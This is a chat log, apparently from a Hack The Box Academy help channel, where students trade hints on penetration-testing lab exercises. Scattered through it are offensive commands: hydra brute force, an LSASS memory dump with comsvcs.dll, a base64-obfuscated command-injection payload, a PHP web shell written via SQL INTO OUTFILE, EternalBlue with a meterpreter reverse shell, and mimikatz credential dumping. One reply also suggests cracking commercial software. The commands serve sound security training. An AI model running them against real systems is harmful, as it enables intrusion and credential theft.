[+] 10.129.225.46 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.129.225.46 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.129.225.46 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.225.46 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 10.129.225.46 - Valid modules for session 1:
Password attacks --> Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.
Password Mutations; I've used the provided lists to create a mutated list with the next cmd: hashcat password.list -r custom.rule --stdout | sort -u > mut_password.list
what did you do after creating the mutated wordlist?
Nothing...what did I miss?
i believe you're supposed to use that wordlist to bruteforce the password for the user sam
i might be wrong tho
Yes, that is what i tried.
with hashcat
hydra -l sam -P password.list ssh://10.129.74.79
that's not what you saved the list as in the command above
Sorry, i've used the mut_password but that one does not give any results so far, that one is already running for a while
look to see if there're any other protocols apart from ssh
ssh can be quite slow to attack
will try ftp
great idea!
Thanks for the help!
hi is there a good way to enumerate CLSID?
so i figured out that the exploit doesnt work bc i dont use a good clsid, but when i search the target with a ps1 tool provided by juicypotato github. It doesnt show any clsids. Someone has any suggestion what to do now?
windows priv skill assessment is a bit frustrating
Can some1 help me with a question in Intro to AD
tried this website? http://ohpe.it/juicy-potato/CLSID/
A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.
Solved! Thanks
Module : modern web exploitation ,, second order LFI ,, changed the names multiple times using different bypassing techniques but didn't work anyone might help
i got the script from it
but im gonna just try random clsid-s i think
?
how to get burpsuite professional for free?
you crack it
You dont
how
I'm on the MacOS fundamentals. It's asking me questions about an instance of MacOS and I can't find any way to launch a MacOS instance anywhere on the page. What am I missing?
you're supposed to use your own mac machine
Well that was never communicated
HTB has used the word "machine" to mean HTB hosted VM in pretty much every other use of the term
it's in the info page before you start the module
Where is that blurb located?
Once again, I don't know why this nmap scan is taking so long to scan the network with my ligolo-ng tool...even though I am using the correct subnet for the IPV4 address I want the nmap tool to scan.
sudo ip route add 172.16.0.0/16 dev ligolo
nmap 172.16.0.0/16 -sn
I followed the tutorial on the main ligolo-ng github page and followed some tutorials online. I still don't get any ping response back when I ping nor does the nmap tool scan the subnet
Oh, I finished Windows and just had the "Continue your path"
Which started MacOS without the main screen explaining it
you can still do the questions, just need to google the right thing 
I'll just dust off the macbook. Hopefully the answers are still compatible with newer macOS versions
And when I type 'ip route' address the scope is there to scan
Got an issue with skill assessment in the module login brute forcing someone who finished it available for dm?
Is this a first / second pivot?
I ran the agent.exe with the target machine ... and then it returned a list that contain three Interface...one of them including the 172.16.x.x...the address I am initially trying to pivot
so add 172.16.6.0/24 to your IP route list and start the tunnel.
even if it starts with 172.16.6.100/16?
Then ping the internal network 172.16.6.100 to check if it worked
The /16 notation allows for significantly more host addresses compared to 172.16.5.0/24.
Don't think you're gonna need that much on a small lab environment.
you mean after I add 172.16.6.0/24?
Yeah, remember to start the tunnel before you ping.
You can also add a single interface to the route list;
sudo ip route add 172.16.6.100 dev ligolo.
Ok. it showed nmap scan results and of course I got a ping connection response back. ,but ligolo also showed connection refuses error. since nmap scan shows port 80(and 445 smb port) get to the web address for that IP internal address
Hey guys,
Regarding the broken authentication module for timing attack exercise, question 3, using timing.py.
I'm getting times completely different every time that I run the script. Any suggestion or tip? Thanks in advance
Anyone got a hint for the 4th flag at Linux Local Privilege Escalation - Skills Assessment? I've found the creds for t*******m user and logged in to the service manager. Am able to upload stuff but the shells won't work
a time saving tip is to get rid of|| passwords under 10 characters long||. doing so, Hydra ran the process in 12 min, while I've heard some folks it took close an hour
Hi guys i need some help with AD Enumeration & Attacks - Skills Assessment Part I iam at question 4 iam trying to pivot with chisel, netsh and the creds i got from the questions before to ms01 via xfreerdp but i just cant get in . I dont understand what iam doing wrong... could someone give me a tip maybe
So I copied the 176.16.6.100 in the web address ...set up a net cat listener on my attacking machine and executed the reverse powershell ...but it just took me back to the target machine address , not the desktop with the internal address. Should I have executed my net cat listener on my target machine?(10.129.43.187)
hey so i'm stuck on a very basic question ....
question: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
i came up with this regex syntax which gives me all the paths but that's not the answer soo anyone has any suggestions ?
['\"]([^'\"]*inlanefreight.com[^'\"]*)['\"]
would inlanefright.com/wp-includes/whatever and inlanefright.com/wp-includes/whatever2 not actually be unique ?
it's more of an understanding problem i guess for me
password attacks --> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full should give me a dump in PS but it does not do anything. The alternative i know via procdump does not work. What did i do wrong?
Thanks! Did that because i needed the creds in the next question and i did not note them, saved some time.
Yes it should be in your attack box. Did you also set up a listener in ligolo ?
wdym does not work, are you running as admin? and try saving to a user dir rather than C root
maybe you don't have privilege to dump the process so try with admin , and maybe you cannot write in C:\ so try C:\windows\temp\
some1 having issues with rdp ?
it's to slow and laggy
use the same script used in the module
I'm in admin mode, ive done the reg.exe save hklm\security C:\security.save etc without any trouble, including file transfer
Am stuck with footprint medium lab right now i have logged in to administrator via rdp but i can not find user HTB's password
Any body have some tip where can i find it ?
okay please screenshot of "whoami /priv"
it looks good , you should be able to dump it
Any body can help Am stuck with footprint medium lab right now i have logged in to administrator via rdp but i can not find user HTB's password
i thought so, the practice isnt using this or unlocking this option. Its password attacks
are you sure , the pid is 672 ?
You don't need to spam the messages mate.
Look for an internal service and enumerate there.
Would I set up a net cat listener onto the target machine? I tried the attacking machine (after I did my ligolo attack) and that didn't work
Depends on what you're doing.
Are you trying to catch a reverse shell?
Yep, this time for the 172.16.x.x address
What is that address?
172.16.6.100
don't you already have access to that device?
isn't that the device that's hooked into your ligolo proxy
Exactly, I really don't know what he's trying to do.
You already have access, no?
Session Security
Section: XSS
Hello I'm trying to repeat the methods in the section but I can't make connections through my payload to my php server. It worked once and then it stopped working. Can I DM anyone?
command injections --> advanced obfuscation --> ip=127.0.0.1%0a${IFS}ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=
This payload does not give me an error, just the ping results. What did i do wrong ? I want the output of the cmd
When I do ifconfig , it list that address . But I actually haven't connected to it . I did an nmap scan of that address and listed the ports associated with that address
What do you mean you haven't connected to it?
I mean I am not in that network. The network just lists that address when I type 'ifconfig'
But you pinged it and it worked; you got responses right? Also nmap came with some results
yep. and I was able to copy and paste that internal address into the web browser. but when I tried to access desktop portion of the internal address...it just took me to the desktop of the target IP machine
nmap results showed port 80 as a port
because the internal IP and the public facing one all belongs to the same host. maybe you are trying to connect to another host on that 172.16.6.0/24 network?
run this command on your attack machine crackmapexec smb 172.16.6.0/24 and tell me the result you get
is crackmapexec good tool?
very useful , but it's no longer supported , you may consider using nxc
thanks
i wanna ask you smth
I messaged you about this
i got told i must write notes in order to progress, but...maybe my notes can be a lot and unnecessary, or too few, i was doing AD and wrote for every term in the terminology section
my question is what kind of notes would be useful
like what should i note
Taking good notes is paramount not only for the course but as a pentester
i feel like im wasting so much time copying entire pages simply because everything is important lol
guess the more i do it, the more i will know what to note
I totally understand, I took both technical / non-technical notes so Ik how it can be 'time-wasting'.
if you get stuck in the exam / skill assessments you can come back to it.
$ crackmapexec smb 172.16.6.0/24
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
[*] Generating SSL certificate
zsh: segmentation fault crackmapexec smb 172.16.6.0/24
You also have Academy search and the modules to refer back to.
tnx for the advice ;3
Did you run your crackmapexec tool on your local machine? @soft cedar
yeah you run it on your attacking machine
ye
Can ping the internal address okay.
you are now in the internal network , you can use ur tools from the attack machine
like password cracking tools
wdym ?
I guess not then since I am on the network
you can
hahahaha , good rap
why?
ik ik
Hi everyone ! someone can help me on Skill assessment 1 in Attacking common app module ? i found the cgi dir but couldnt find the executable
Does this mean crackmapexec tool is not installed on my local machine?? crackmapexec --help 127 ⨯
<frozen importlib._bootstrap>:219: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
...
...
[*] Generating SSL certificate
zsh: segmentation fault crackmapexec --help
What AD object handles all authentication requests for a domain?
Domain Controllers
Domain Controllers are essentially the brains of an AD network. They handle authentication requests, verify users on the network, and control who can access the various resources in the domain. All access requests are validated via the domain controller and privileged access requests are based on predetermined roles assigned to users. It also enforces security policies and stores information about every other object in the domain.
NATE WHY ITS SAYING ITS WRONG
check with crackmapexec --version
or if its giving error then just google how to check
what is it bruuuuh
WHAT it literally didnt accept Domain Controllers but Domain Controller is the right one
like...tf?
Hi guys i got stuck in Password Reuse / Default passwords section of Password Attacks module. I got the creds for Sam and logged in via ssh. I tried googling to find default creds and roaming around in all the dirs back and forth but couldnt find password for mysql what should i do. [But i did find something interesting in other two user directories but i am not sure whether its relevant to the task at hand]
i genuinely dont know what RDP stands for cuz i havent gotten there yet, i assume its Remote Desktop Protocol but cant be sure
OMG I ACTUALLY GOT IT RIGHT
yeah you got it
^-^
When I first ran crackmapexec --version . It showed the same error. Tried google and chat gpt suggestions for fixing this error . IF anyone here has encountered a similar error on their local machine (in my case, ubuntu virtualbox) , I really would like to hear how you troubleshot that error.
try pipx install nxc
and then use nxc instead of crackmapexec
they had the same syntax
you still stuck?
yeap I have a doubt Is it about mutating the previously found passwords or to guess which passwords were reused in the previously cracked services?
yeah no that would be a rabbit hole, I recommend double checking the resources they give you in that section for default credentials for services you may have enumerated on the box locally.
Finally I'm done with it! Thanks a lot found the creds for mysql!
yeah no when I was doing the password attacks section I can remember how much of a headache it was
So, get this: The answer was staring me right in the face, and I completely ignored it because I was busy overthinking. Turns out, I attempted to use some local privilege escalation script, but guess what? It hilariously failed because, duh, it needs sudo access!
Thanks for your reminder !
no problem
Think lots of us can relate...spending lots of time and work while the answer is in our view constantly 
am i using fake time correctly proxychains sudo faketime '2024-02-20T20:56:55' /bin/date | proxychains GetUserSPNs.py -dc-ip 172.16.8.3 INLANEFREIGHT.LOCAL/mssqladm -request-user ttimmons
fuck yeah i got it
I initially had issues with running that command. Then followed steps suggested by chatgpt online to follow the pipx command. Verified that pipx was installed with 'pipx --version'. Ran the command again and got a new error. Followed the steps that chat gpt suggested and their suggestions did not work.
Also do you think the command that I am running has to do with the version of linux that I am running on my local machine?
User
pipx install nxc
The virtual environment was not created successfully because ensurepip is not
available. On Debian/Ubuntu systems, you need to install the python3-venv
package using the following command.
apt-get install python3-venv
You may need to use sudo with that command. After installing the python3-venv
package, recreate your virtual environment.
Failing command: ['/home/noblegas/.local/share/pipx/shared/bin/python3', '-Im', 'ensurepip', '--upgrade', '--default-pip']
'/usr/bin/python3 -m venv --clear /home/noblegas/.local/share/pipx/shared' failed
uname -a 1 ⨯
Linux kali 5.9.0-kali1-amd64 #1 SMP Debian 5.9.1-1kali2 (2020-10-29) x86_64 GNU/Linux
I stopped working on the CPTS three weeks ago because of all the issues with their VPN's and still cannot access targets
Is there a channel that is providing an ETA when this will be fixed?
Have you contacted support?
so many times
they tell me to switch the vpn connections.
I literally have them saved on my desktop and switched to each one, spawned a new box each time and attempted connection
EU1 UDP is working for the particular module I am on now, but the RDP connection to the target is lagging and keeps disconnecting
have you tried in xfreerdp using the flag /network:modem? this helps for me
Whenever you change vpn it generates a new one as an fyi
So saving a bunch of old ones doesn't help
I can, DM me. And please remove the spoiler if you may.
hello
how can u solve the creds hunting in linux section in the password attacks without the hint?
how can u find the kira creds?
Enumerating likely
The targets are reused within that module
So you can go to any one of the linux ones and check /home/ for usernames
Hello i am having hard time with the Linux Fundamentals ( Submit the full path of the "xxd" binary.)
i have found it but i think i am writing wrong
who is the author of Recollection sherlock challenge?
better ask in #sherlocks
if you have no access, read and follow #welcome
true
im in Passwd, Shadow & Opasswd
section , i can't crack the root hash with neither rockyou.txt or password.list from resources
Perhaps a mutated list will work
yes i did it but still hashcat got exhausted
orr wait
i tried the mutated list , and even created a mutated list with will's password, ran hashcat, still exhausted
anyone else having lab connection issues in the Windows Attacks & Defense module?
i'm seeing a lot of this very frequently, then i get about 30-60 seconds before i lose connection again
Why would you mutate his password?
You can reach out to support
Need to speak to a person? Learn how to reach our support via HTB Labs.
i'm taking a break now, so if it happens again when i continue, i will do so. thanks
tbh i just tried it for no reason since every other wordlist didn't work
or maybe im doing something wrong
Try with just the root opasswd part in a file see if you get an error
hi any idea what could be wrong with my syntax ?
||ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:49492/FUZZ -recursion -recursion-depth 1 -e .php,.phps,.php7 -v||
FFuF skill assessment
how are you writing it?
looks fine to me
did you get any errors?
i just tried it
idk what im doing wrong
1- i found the hidden folder
i get nothing back
¯\_(ツ)_/¯
2- transferred the pass.bak and shadow bak and unshadowed them in my attack machine
try a different wordlist
maybe the medium list will be fine
you're on the right track
hello there, anyone willing to share a hint about how to find the ldapadmin & confidential.txt files from WPE Assessment I?
I'm trying with findstr /SIM /C:" as shown into the section with no success
can't find the right wordlist tho
im done can anyone give me the answer or just the wordlist im hard stuck
the mutated_wordlist should work fine. I'm not at my computer rn to double check and verify but i'm like 99% sure it's in mutated
i'm also sure you're using the right mode
||1800||
yes im using the exact syntax given
||hashcat -m 1800 -a 0 /tmp/unshadowed.hashes /usr/share/wordlists/rockyou.txt -o /tmp/unshadowed.cracked||
but with the mutated wordlist
the mutated wordlist created by the custom.rule and password.list given
hmm
I guess it's normal
did you tried rockyou ?
I don't have a solution but can I DM you for help on how you got there? I'm stuck at the transferring ccache stage and nothing seems to work.
Do you know what it looks like when hashcat does crack the pw? Sometimes it doesn't show that clearly even though it got a hit
i tried it but it taking forever and i heard that you can crack it with just the mutated list, im retrying rn with rockyou
you are using the -o so idk if the password will be printed on the screen or only to the file
i mean , all i wait for in hashcat to crack a password is the "cracked"
its should be printed to the file but hashcat give the exhausted status and no file get created idk
Unfortunately, I'm back again for assistance from you great HTB peeps: My steps
Attacking Common Services - Easy Box
- added ip and domain to /etc/hosts
- got the creds <f*Ainlane...> <#>
- Extracted docs from webpage and even ftp # showed directory to put file
- Got on the database and did the "INTO OUTFILE" command to the correct directory
<?php system($_REQUEST['cmd']);?> tried shell_exec with ($_GET...([]) as well - Went back to the webpage and tried to run the cmd that I uploaded and I get an error.
when I try to do the command http://ip-addr/exploit.php?cmd=whoami
Any assistance would be appreciated
just finished cracking and did --show, it cracked 2 hashes only, not the desired hash
figured out
[sam@parrot]-[~]$ smbclient -L //10.129.43.200
do_connect: Connection to 10.129.43.200 failed (Error NT_STATUS_IO_TIMEOUT)
attacking common services easy lab why
You forgot the ending / --- //ip-addr/
that doesn't make any diff
[sam@parrot]-[~]$ smbclient -L -N //10.129.43.200/
do_connect: Connection to 10.129.43.200 failed (Error NT_STATUS_IO_TIMEOUT)
I'm struggling with the section ICMP Tunneling with SOCKS within the Pivoting module. I can successfully establish the ICMP tunnel, but attempting to RDP to the DC results in timeouts. The tunnel now states the following, not sure what happened. I'm using the Pwnbox.
[inf]: Packet discarded - outside receive window.
[inf]: Packet discarded - outside receive window.
[inf]: Packet discarded - outside receive window.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
RHOSTS 10.10.10.40 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH false yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET false yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.19 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
1 Windows 7
Can anyone see what I'm doing wrong?
Excuse me sir?!
LE BREAD?!
Also, no one knows anything about anything based on options of eternal blue module
I've tried different payloads, ensured my options are correct and MSF refuses to work.
So what's the actual issue
My issue is that I want to double check that I'm doing it correctly.
maybe you forgot to change the LHOST
actual trying to help actual, wtf is going on here?
so is there anything wrong? just run it
yes
yes , it is the one able to connect to the lab
GOAT.
It's a new Baremetal install -_-
Calm down.
I guess the world will never know until you run the exploit
Already dumped hashes my boy
Now either eat bread or change pfp
Jadin it's actually just basic networking, if you look at the ifconfig on your pwnbox it will show you the interfaces that connect to the SMB server
that's right
ifconfig won't really show what interfaces connect; ip route will show what interfaces route though
I figured my side of the tunnel would route to my private. - apparently it does not.
actual won't sleep cuz of @onyx sonnet pfp
I think for academy it's routed as 10.129.0.0/24 dev tun0
sudo ip route show cause we care about stuff
I'm actually gonna go make burgers
There's a weird issue in the AD Enumeration & Attacks assessment part 2. For some reason, after getting the administrator's NTLM hash on the SQL01 machine, you can't evil-winrm or do any PtH with any other service using the acquired hash after dumping the LSA with mimikatz. I made sure I wasn't crazy about my approach, as I saw someone else do it on YouTube for the same assessment. Left me utterly confused as to why it doesn't work on my end.
I've been at this for several days now, I'm just going to the next module I'm tired.
i suggest you do the intro to metasploit module
iirc I didn't solve it this way
the local admin might be disabled, but you can try with local authentication using psexec
i tried psexec too
afaik evil-winrm doesn't have a local auth option so that won't work for sure
I tried smbexec and wmiexec too, nothing. I think there is actually something wrong with the targets, more specifically for me but not others.
but it's alright i'll come back to it later.
nothing wrong with the lab
I've seen a case like this before, someone had tried to crack a hash and I was able to do it on my end, but when he tried to do it using the exact same commands/approach it didn't work for him.
@limber river how did you end up breaking into MS01 as admin?
for me I got rev shell from SQL01
||then I dumped the hashes using lsa with mimikatz||
yes that's what i did lol it is the correct approach to take.
then use what you got against MS01
wait, if you got a shell from SQL01, why tf are you trying to use PtH against it?
what I'm gonna say lol
ik ik , I talked too much
I was trying to pth from the attack box to MS01 directly instead of pth from SQL01 to MS01... is that the issue? I don't know it just wouldn't make any sense to me
what are you trying to pth with? the local admin hash?
hello everyone, question regarding subscriptions for the academy: is the silver subscription the same whether paid yearly or monthly? Seems monthly is cube based, right, and yearly is access based, am I correct?
still can't crack the root password, it's been 4 hours and I'm still stuck on that question
yes, for silver annual you get access to all tier 2 and below modules, for all monthly subs you get cubes
dm me the hash
Thanks
okay 
Fun fact. Up until recently I never knew you can PtH with smbclient 🤣
Smb as protocol yes but not smbclient. Forgot what it is I was doing that prompted me to try it
well you know from mimikatz you run lsadump::lsa you get a hash for the administrator, that hash I thought is not for the local administrator right?
I mean we're talking about a dump of the LSASS service, no?
okay
look for a cleartext cred
your tool is lsass stuff yeah?
it does both now after an update
ooh nice
did you learn that on Maldev ?
some of the techniques used yes, and a lot of independent research
Trying MSSQL linked server, and I got an error "Linked servers cannot be used under impersonation without a mapping for the impersonated login." Does that mean that user doesn't have the permission to connect to the linked server?
that sounds correct
well I found a cleartext password for a different account, not the administrator, it was mssqlsvc
it doesn't lead anywhere though
yes?
try it on other hosts
@next bronze DM
thanks @next bronze
PASSWORD ATTACKS >>>
Password Attacks Lab - Medium>>>
Examine the second target and submit the contents of flag.txt in /root/ as the answer.
Hey all, in the above question I tried using Hydra to get a list of usernames with possible passwords but it didn't give any results. I also tried using msfconsole to exploit SMB but no luck. I'm not sure how else to look for a user or get to root. Can someone help/hint?
You're skipping basic first steps
can you explain please? I have already tried everything from that module but can't seem to find that initial step!
Enumeration
step 0) enumerate
I enumerated Target and saw 2 ports were open: SSH and SMB
knowing that I tried supplying username with password through hydra to ssh to target but no luck. And same for SMB
That's it, nmap? Throw the drill at the open ports? Nothing else you can use a magnifying glass at?
ok so I did get a username and password by using crackmapexec through the SMB port but the password isn't being accepted and throws "Permission denied, please try again."
You're going to need to review your notes from prior modules as this step is just basic footprinting
Session Security
XSS & CSRF Chaining
Both of the scripts in this section don't work properly. They only affect the profile that the payload is stored in and not the profile with the new session
yes
I updated my question
Ok so I was able to access the shares of user j*** and copied the .zip file to my machine, cracked the hash, and the .zip file extracted to a .docx. When I cat the .docx file it gives me gibberish text. The file isn't encrypted either. Am I in the right direction?
.docx isn't meant to be cat
You'll need a document reader like Libre office or whatever it's called
interesting, I didn't know that. I'll try converting it to txt and cat it
does that come with Attack machine?
why all of that when there's software dedicated to reading these files?
are you using pwnbox ?
yes
it should be installed
idk if it is installed or not
if not i think it's easily installed with sudo apt install libre-office
you can do that in pwnbox ?
yes
at this point in the course i'm assuming they have either a sub or bought cubes
which fully unlocks the pwnbox
it's sudo apt install libreoffice
oh yeah currently parrot repos are a bit borked
you'll need to uncomment out lines 71-74 in /etc/apt/sources.list.d/parrot.list
I'm getting lots of errors just to install libreoffice and it's so stupid pwnbox doesn't come with one
there's also the website I got ¯\_(ツ)_/¯
that literally links to how to install libreoffice on linux
learning how to install tools is an important step in becoming successful
true, working on it
hi there, I escalated privileges on a Windows 2016 server, added a user & assigned it to the Admin group, then connected to the server via RDP, but when I try to change to the Administrator folder I get an Access Denied message. What could I have done wrong?
is this normal that my VM's uptime is 1-2 min? I cannot do my exercises because VM seems to reboot constantly..
do you mean It restarts automatically?
yes
Alright, I hardly use the pwnbox.
Maybe try restarting the instance / switch vpn servers
will try terminating and starting it again. thank you for your suggestion.
If the problem persists, you should contact support
Hello, I am currently locked in the exercise "ACL Enumeration" in the section "ACTIVE DIRECTORY ENUMERATION & ATTACKS" on the question "What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)"
I used SharpHound and BloodHound and got this graph:
.... I got it